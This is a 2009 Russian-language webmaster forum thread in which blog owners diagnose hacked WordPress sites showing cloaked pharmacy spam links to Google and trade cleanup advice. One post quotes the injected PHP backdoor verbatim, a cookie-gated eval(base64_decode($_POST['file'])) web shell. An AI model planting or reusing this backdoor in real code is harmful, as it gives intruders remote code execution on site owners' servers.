Реклама на сайте Advertise with us

Взлом WP (название изменено)

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 26/01/09 в 07:42       Ответить с цитатойцитата 

Бля пипец, слов нет.
На ревью (на WP) стало идти гораздо меньше тематического трафика с гугла. Думаю ну бывает, колбасит, а тут решил зайти в Вебмастер тулз и прихуел.
Гугл видит нормальные внешние ссылки по кеям, но в содержании сайты 95 позиций из топ-100 одни виагры и ханахи всякие, короче он видит у меня в содержании сайта одни таблеткиicon_sad.gif
На сайте естественно этого ничего нет. Начинаю выяснять в чем дело и оказывается следующее.
В Аксимете выловлено 3600 спамовых камментов. WP их не показывает. Захожу в гугл и делаю поиск xanax по моему сайту. Он находит несколько вхождений этого слова на сайте. Открываю через гугл кешированную страницу, этого слова естественно не вижу, но делаю открыть текстовую версию и бля на тебе, гугл видит все камменты, которые были пойманы Аксиметом. Вот такой вот бля неприятный сюрприз. Только материться хотелось.
Сейчас весь спам из аксимета удалил, буду ждать, что скажет гугл.

Эту фишку про Аксимет только я не знал или это давно известный факт?

Последний раз редактировалось: miroz (28/01/09 в 08:25), всего редактировалось 1 раз

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 26/01/09 в 07:56       Ответить с цитатойцитата 

Только что проверил еще один блог, где стоит аксимет. Таже фигня.

Так что всем кому дороги проекты рекомендую периодически удалять спамовые камменты из аксимета.

0
 
+ + +
www.sgmanaged.com

С нами с 01.12.07
Сообщения: 691
Рейтинг: 403

Ссылка на сообщениеДобавлено: 26/01/09 в 09:58       Ответить с цитатойцитата 

miroz писал:
стало идти гораздо меньше тематического трафика с гугла.


Может все таки ботов хрумера стало меньше идти а не тематического трафика ?

-5
 

In God We Trust..

С нами с 18.02.07
Сообщения: 1648
Рейтинг: 2028


Передовик Master-X (16.11.2007) Передовик Master-X (01.12.2007) Передовик Master-X (16.12.2007) Передовик Master-X (16.04.2008) Передовик Master-X (01.05.2008) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 26/01/09 в 10:37       Ответить с цитатойцитата 

ни на одном из блогов не нашел ничего похожего
какие версии WP и плагина?

Лишившись гнезда, Птица весь мир обретет. Жить ради жизни.

5
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 26/01/09 в 11:48       Ответить с цитатойцитата 

WP 2.1 версия и 2.3.2 (на обоих замечено)
Aksimet 1.2.1 и 2.1.3

Если периодически удаляешь спам из раздела Aksimet Spam(), то ничего не будет. А если там полно спама (как было у меня, так как я давно не следил за этим), то могут быть хреновые последствия.

Оффтопик: to girl4look: Ты читать не умеешь или ботов от гугла отличать?

0
 

In God We Trust..

С нами с 18.02.07
Сообщения: 1648
Рейтинг: 2028


Передовик Master-X (16.11.2007) Передовик Master-X (01.12.2007) Передовик Master-X (16.12.2007) Передовик Master-X (16.04.2008) Передовик Master-X (01.05.2008) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 26/01/09 в 12:18       Ответить с цитатойцитата 

самый необновленный у меня WP 2.5.1 и Akismet 2.0.2 - такой проблемы нет, так что видимо стоит проапдейдиться (наверное старый баг какой-то был, который исправили уже)

Лишившись гнезда, Птица весь мир обретет. Жить ради жизни.

0
 



С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375


Передовик Master-X (01.02.2007) Передовик Master-X (16.02.2007) Передовик Master-X (01.04.2007) Передовик Master-X (01.05.2007) Передовик Master-X (01.10.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 26/01/09 в 14:12       Ответить с цитатойцитата 

короче это не акисмет, у меня такая проблема была, это взлом был, стукни мне посмотрим, может я ошибаюсь

0
 

1К13!

С нами с 07.05.04
Сообщения: 7721
Рейтинг: 2428

Ссылка на сообщениеДобавлено: 26/01/09 в 14:49       Ответить с цитатойцитата 

ты глянь в хтмл-коде, где нормальные каменты располагаются, а где твои ксанаксы - если они располагаются не в том месте, где обычно положено быть каментам - значит тебя поломали скорее всего и акисмет ни при чём.

Talitha kumi!

0
 

Old Oil Barrel

С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265


Передовик Master-X (16.07.2005) Передовик Master-X (16.10.2005) Передовик Master-X (01.12.2006) Передовик Master-X (01.03.2007) Передовик Master-X (16.03.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 26/01/09 в 15:51       Ответить с цитатойцитата 

не должно быть этой траблы, иначе бы все уже орали на каждом углу...

Аксиментом пользуются 99 % блогеров

Правило буравчика

0
 



С нами с 07.08.07
Сообщения: 222
Рейтинг: 111

Ссылка на сообщениеДобавлено: 26/01/09 в 15:56       Ответить с цитатойцитата 

поломали 100%

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 26/01/09 в 17:06       Ответить с цитатойцитата 

Да я думаю поторопился я насчет Аксимета это у меня не в камментах, это в футере, беру таймаут разобраться.
Странно в кеше эсли смотрим исходный код я вижу эту дрянь, а если сейчас сайт открыть то не вижу.

0
 

1К13!

С нами с 07.05.04
Сообщения: 7721
Рейтинг: 2428

Ссылка на сообщениеДобавлено: 26/01/09 в 17:31       Ответить с цитатойцитата 

было такое. спам-ссылки выводятся клоакингом по юзер-агенту вроде.
глянь http://www.google.com/search?num=100&hl=en&lr=&safe=off…tnG=Search

быстрое решение - это "убрать wp_footer() и wp_head() из темы"

зы - последствия в гугле нивелируются через некоторое время. у меня на одном блоге так пр4 слетел. после того как эту херь я грохнул - через месяцок всё поправилось.

Talitha kumi!

0
 



С нами с 13.12.06
Сообщения: 333
Рейтинг: 433

Ссылка на сообщениеДобавлено: 28/01/09 в 02:50       Ответить с цитатойцитата 

У меня такое было. После тега </body>вставили кучу ссылок на таблетки. По моему это называется sql injection, обезательно апдейть,проверь бд вордпреса, меняй пароли доступа к бд и вордпресу.

ZZZ

0
 

АВМ женского пола

С нами с 09.02.06
Сообщения: 1292
Рейтинг: 1022

Ссылка на сообщениеДобавлено: 28/01/09 в 05:15       Ответить с цитатойцитата 

batyar, а как проверять бд вордпресса?..

Блог АВМа Женского Пола | LL

0
 



С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016

Ссылка на сообщениеДобавлено: 28/01/09 в 08:24       Ответить с цитатойцитата 

Да, Аксимет тут ни причем, ложная тревога. Это был взлом.
Сейчас обновился. Пароли менять обязательно? Или это просто рекомендация?
Как в базе пароль поменять? где?

0
 



С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375


Передовик Master-X (01.02.2007) Передовик Master-X (16.02.2007) Передовик Master-X (01.04.2007) Передовик Master-X (01.05.2007) Передовик Master-X (01.10.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 28/01/09 в 10:40       Ответить с цитатойцитата 

miroz писал:
Пароли менять обязательно? Или это просто рекомендация?
Как в базе пароль поменять? где?


обязательно поменять, пароль для БД меняется в клиентской части на хосте, если нет прав доступа прям в phpmyadmin, если фрихост попроси суппорт поменять

4
 



С нами с 11.03.03
Сообщения: 164
Рейтинг: 195

Ссылка на сообщениеДобавлено: 28/01/09 в 11:23       Ответить с цитатойцитата 

Аксимент ни при чем.
у меня было тоже самое, сначала повесили ссылки в header.php, я вычистил и закрыл правами его, через пару дней эти же сылки были в теле поста.
заполз в бд, посмотрел дату добавления этой дряни - после логи апача, и выяснилось, что это было добавлено через админку wp. я охренел и с помощью .htaccess закрыл wp-admin и wp-login.php, этого хватило. более ссылок на виагру и ханах не появлялось.

4
 



С нами с 29.06.05
Сообщения: 33
Рейтинг: 47

Ссылка на сообщениеДобавлено: 28/01/09 в 16:21       Ответить с цитатойцитата 

У меня таким способом были тоже взломаны блоги. Погуглил нашел статью http://cssing.org.ua/2008/06/01/wp-footer-exploit/
Рекомендую всем владельцам блогов проверится таким способом.

8
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 28/01/09 в 17:14       Ответить с цитатойцитата 

7
 



С нами с 01.12.07
Сообщения: 694
Рейтинг: 102

Ссылка на сообщениеДобавлено: 29/01/09 в 18:27       Ответить с цитатойцитата 

сегодня проверил свои блоги ради интереса через гуглю на все воткнули типа этого<?php if(md5($_COOKIE['694b248c580030ea'])=="0762be3b43ab8216e88511c21e96c453"){ eval(base64_decode($_POST['file'])); exit; } ?>
гадство придется обновлять теперь все блоги

0
 
+ + +


С нами с 25.01.09
Сообщения: 388
Рейтинг: 129

Ссылка на сообщениеДобавлено: 29/01/09 в 22:16       Ответить с цитатойцитата 

batyar писал:
У меня такое было. После тега </body>вставили кучу ссылок на таблетки. По моему это называется sql injection, обезательно апдейть,проверь бд вордпреса, меняй пароли доступа к бд и вордпресу.


Заеплись бы инжектить. У ВП хорошая длина ключа, да и инт они не забывают icon_smile.gif ))) Я запрещал запрос блога более чем 10 раз с одного ип и делал пароли от 12 и выше символов (то есть инжектом просто по теории не взять) - всё равно инфреймили. Имхо, он если и делают инжект, то общий инжект хоста, внутренних паролей. А так, если не это, то имхо просто дыра в ВП есть. Вот на Джумле же находили дыры, когда по конанде в какой-то там её форме она подгружала как фтп клиент любой файл, типа демона в сgi.

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 30/01/09 в 09:48       Ответить с цитатойцитата 

Да поставьте вы мод_секюрити и забудьте про 90% дыр.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »